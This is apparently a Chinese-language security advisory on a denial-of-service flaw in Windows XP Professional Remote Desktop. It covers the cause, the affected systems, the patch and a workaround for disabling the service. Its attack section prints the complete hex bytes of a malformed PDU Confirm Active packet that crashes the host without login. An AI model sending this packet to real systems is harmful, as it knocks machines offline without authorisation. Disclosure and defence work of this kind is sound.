|
Microsoft Windows XP 远程桌面 DoS 缺陷
Microsoft Windows XP 远程桌面 DoS 缺陷 (MS,补丁)
涉及程序:
Windows XP Professional Remote Desktop
描述:
Microsoft Windows XP 远程桌面 DoS 缺陷
详细:
Remote Desktop 是 Windows XP Professional 单用户远程桌面协议(Remote Desktop Protocol,简称RDP)服务程序。在当
Windows XP Professional 的远程桌面(Remote Desktop)即终端服务被启动时很容易遭到远程拒绝服务攻击。
在远程桌面协议启动时,客户端和服务器端会进行图形处理能力会话协商,发送的会话数据包中含有一个叫做 PDU Confirm Active
的数据单元,这个数据单元中有一个32字节的数据块允许客户端进行选项设置关闭程序所不支持的“drawing”指令。
在这里需要知道 Pattern BLT 指令是否被发送,在Windows 2000 Server中,关闭这个指令可以使服务端发送 bitmaps 指令来替代
Pattern BLT 指令。但是向 Windows XP Professional 递交 Pattern BLT 指令时,可使 Windows XP
Professional
崩溃而重启,而且因为崩溃是在登录屏幕进行着色图案操作时发生的,所以攻击者在客户端进行拒绝服务攻击是无需登陆或验证的。经测试所有版本的RDP协议(RDP
4.0 ,5.0 和 5.1)均受此缺陷影响。
受影响系统:
Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3
不受影响系统:
Microsoft Windows 2000 Server
攻击方法:
发送如下未加密的超长 PDU Confirm Active 数据包可使 Windows XP Professional 远程桌面系统崩溃:
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
解决方案:
下载补丁:
http://www.microsoft.com/WindowsXP/pro/downloads/servicepacks/sp1/default.asp
临时解决方案:
* 禁止远程桌面服务:
控制面板(Control Panel)-->系统(System)-->远程(Remote)-->远程桌面(Remote
Desktop)-->删除选项"允许用户远程连接到此计算机(Allow users to connect remotely to this
computer)"
附加信息:
无
相关站点:
http://www.net-security.org/vuln.php?id=2058 |